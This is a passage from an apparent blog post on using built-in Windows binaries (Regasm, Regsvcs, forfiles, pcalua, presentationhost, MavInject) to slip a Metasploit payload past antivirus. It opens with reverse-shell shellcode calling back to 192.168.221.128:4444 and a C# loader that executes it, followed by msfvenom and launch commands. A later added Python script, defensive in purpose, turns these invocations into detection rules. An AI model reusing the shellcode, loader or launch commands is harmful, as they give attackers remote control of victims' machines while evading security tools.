0x75,0xef,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,
0x85,0xc0,0x74,0x4c,0x01,0xd0,0x8b,0x58,0x20,0x50,0x8b,0x48,0x18,0x01,0xd3,
0x85,0xc9,0x74,0x3c,0x31,0xff,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xc0,0xac,
0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,
0x75,0xe0,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,
0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,
0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xe9,0x80,0xff,0xff,0xff,0x5d,
0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,
0x07,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,
0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,0x68,0xc0,0xa8,0xdd,0x80,0x68,0x02,
0x00,0x11,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,
0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,
0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x67,0x00,0x00,
0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,
0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,
0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,
0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x68,0x00,
0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,
0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0x0f,0x85,0x70,0xff,
0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb,
0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5 };




UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
// prepare data


IntPtr pinfo = IntPtr.Zero;

// execute native code

hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);
return;
}

private static UInt32 MEM_COMMIT = 0x1000;

private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

[DllImport("kernel32")]
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
UInt32 size, UInt32 flAllocationType, UInt32 flProtect);


[DllImport("kernel32")]
private static extern IntPtr CreateThread(

UInt32 lpThreadAttributes,
UInt32 dwStackSize,
UInt32 lpStartAddress,
IntPtr param,
UInt32 dwCreationFlags,
ref UInt32 lpThreadId

);

[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(

IntPtr hHandle,
UInt32 dwMilliseconds
);


}

}

Compile the .cs into a DLL with csc.exe:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:1.dll /keyfile:key.snk regsvcs.cs

With the msf listener ready, register the DLL with Regasm.exe or Regsvcs.exe:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regasm.exe 1.dll

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exe 1.dll

Forfiles.exe

Forfiles is one of the file-search utilities installed on Windows by default: it selects files by name, modification date and other criteria and runs a command on each one. It works from the command line and from batch files or other scripts, and since the /c command is arbitrary it doubles as a launcher.

Generate an MSI payload (the file extension does not matter to msiexec):

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.221.128 LPORT=4444 -f msi > test.txt

Run it:

forfiles /p c:\windows\system32 /m cmd.exe /c "msiexec.exe /q /i C:\test\test.txt"

360 flagged it immediately.

Pcalua.exe

Pcalua is a component of the Windows Program Compatibility Assistant; -a launches the given file:

pcalua.exe -a <exe/bat/dll>

During testing an unprocessed trojan was deleted before it even ran, so do some evasion work on the payload first.

presentationhost.exe

Presentationhost.exe is a built-in Windows executable that runs XAML browser applications (.xbap files):

Presentationhost.exe C:\temp\Evil.xbap

Behavior-detection warning.

SyncAppvPublishingServer.vbs

Not present in the test environment.

MavInject32.exe

MavInject32.exe is part of Microsoft Application Virtualization and can inject code straight into a running process.

Usage

MavInject32.exe <PID> /INJECTRUNNING <PATH DLL>

I did not find this file on Win7, nor on my own Win10; it depends on the environment.
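
Every technique above ends up as a process-creation event with a recognisable command line, which is what 360's behavior detection is keying on. The triage below is an added example, not code from the original post or from any tool it cites: it encodes the invocation shapes shown on this page (msbuild with an .xml project, msiexec from a URL or from a renamed package, installutil /U, mshta with a URL, rundll32 from a user-writable path, forfiles /c wrapping msiexec, regasm/regsvcs with a DLL, pcalua -a, presentationhost with an .xbap, MavInject32 /INJECTRUNNING) as rules over Sysmon event 1 / Security 4688 fields. The cmstp, regsvr32 and wmic command-line shapes are taken from the LOLBAS entries, because the page only shows the .inf and .xsl files. SAMPLE_EVENTS is constructed, the SUSPICIOUS_PARENTS set and the user-writable path hints are assumptions to tune per estate, and the regasm/regsvcs rule is deliberately noisy on developer machines.

```python
"""Process-creation triage for the LOLBins covered on this page, over the fields a
Sysmon event 1 / Security 4688 record gives you: parent image, image, command line.
Added example, not from the original post or any tool it cites.  SAMPLE_EVENTS is constructed."""
import re

# (image basename, command-line regex, reason).  Heuristics: tune before alerting on them.
RULES = [
    ("msbuild.exe", r"\\\\\S+|\S+\.xml\b", "msbuild compiling an inline-task project from a .xml or UNC path"),
    ("msiexec.exe", r"/i\s+https?://|/i\s+\S+\.(txt|png|jpg|gif|tmp|dat)\b",
     "msiexec installing from a URL or a package not named .msi"),
    ("installutil.exe", r"/u\b|/logfile=\s", "installutil /U running Installer.Uninstall from the assembly"),
    ("mshta.exe", r"https?://|\b(vbscript|javascript):", "mshta executing a remote or inline script"),
    ("rundll32.exe", r"\\\\|\\users\\|\\temp\\|\\appdata\\|\\test\\",
     "rundll32 loading a DLL from a user-writable or network path"),
    ("regsvr32.exe", r"/i:\S*https?://|scrobj\.dll", "regsvr32 scriptlet (.sct) execution"),
    ("cmstp.exe", r"/(s|ni)\b.*\.inf|https?://\S+\.inf",
     "cmstp silently installing an .inf (RegisterOCXs / RunPreSetupCommands hooks)"),
    ("ftp.exe", r"-s:", "ftp.exe driven by a script file (lines starting with ! run shell commands)"),
    ("wmic.exe", r"/format:\S*(https?://|\.xsl)", "wmic loading an XSL stylesheet whose ms:script block runs JScript"),
    ("regasm.exe", r"\.dll", "regasm running [ComRegisterFunction]/[ComUnregisterFunction] code"),
    ("regsvcs.exe", r"\.dll", "regsvcs running [ComRegisterFunction]/[ComUnregisterFunction] code"),
    ("pcalua.exe", r"-a\s", "Program Compatibility Assistant used as a launcher"),
    ("presentationhost.exe", r"\.xbap\b", "presentationhost running an XBAP"),
    ("mavinject.exe", r"/injectrunning", "mavinject injecting a DLL into a running process"),
    ("mavinject32.exe", r"/injectrunning", "mavinject injecting a DLL into a running process"),
]
# Parents that should never be launching build/install tooling (assumption; extend per estate)
SUSPICIOUS_PARENTS = {"wmiprvse.exe", "mshta.exe", "wscript.exe", "cscript.exe",
                      "winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(parent, image, cmdline):
    """Return the reasons this event is suspicious; an empty list means no rule fired."""
    name = basename(image)
    hits = [reason for rule_image, pattern, reason in RULES
            if name == rule_image and re.search(pattern, cmdline, re.IGNORECASE)]
    if name == "forfiles.exe":
        # forfiles /c "<command>" is only a wrapper: judge the wrapped command as its own event
        wrapped = re.search(r'/c\s+"([^"]+)"', cmdline, re.IGNORECASE)
        parts = wrapped.group(1).split() if wrapped else []
        if parts:
            hits += [f"via forfiles /c: {r}" for r in classify("forfiles.exe", parts[0], wrapped.group(1))]
    if hits and basename(parent) in SUSPICIOUS_PARENTS:
        hits.append(f"spawned by {basename(parent)}")
    return hits

# Constructed events: (parent image, image, command line), shaped like the commands on this page
SAMPLE_EVENTS = [
    ("explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ("cmd.exe", r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe", r"msbuild.exe C:\test\shell.xml"),
    ("cmd.exe", r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe",
     r"InstallUtil.exe /logfile= /LogToConsole=false /U C:\test\shell.exe"),
    ("winword.exe", r"C:\Windows\System32\mshta.exe", "mshta.exe http://192.168.221.128/CACTUSTORCH.hta"),
    ("cmd.exe", r"C:\Windows\System32\forfiles.exe",
     r'forfiles /p c:\windows\system32 /m cmd.exe /c "msiexec.exe /q /i C:\test\test.txt"'),
    ("cmd.exe", r"C:\Windows\System32\wbem\WMIC.exe", 'wmic os get /format:"http://192.168.221.128/payload.xsl"'),
    ("msiexec.exe", r"C:\Windows\System32\msiexec.exe", r"msiexec.exe /i C:\installers\app.msi /qn"),
]

def triage_events(events=SAMPLE_EVENTS):
    """Return [(image basename, reasons)] for every event that fired at least one rule."""
    out = []
    for parent, image, cmdline in events:
        reasons = classify(parent, image, cmdline)
        if reasons:
            out.append((basename(image), reasons))
    return out

if __name__ == "__main__":
    for image, reasons in triage_events():
        print(f"{image}: " + "; ".join(reasons))
```

Run as-is it reports the five events that fire; the benign cmd.exe and the local .msi install stay quiet. The forfiles branch is the part worth copying: wrappers like forfiles /c and pcalua -a need to be unwrapped and the inner command judged on its own, otherwise a rule set that only looks at the outer image is bypassed by nesting.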

Summary

Over this period I mainly worked through 重剑无锋's series on RAT evasion, combined with whatever material I could find online; at this point I am at beginner level at best.

In my own tests the evasion results of some methods differed from what the articles reported, and many methods failed to reproduce because of odd problems. I emailed the author a few times with questions and have not heard back yet. Once I understand evasion techniques more deeply I may reorganize these posts, or rewrite them.

References

LOLBAS: https://lolbas-project.github.io/#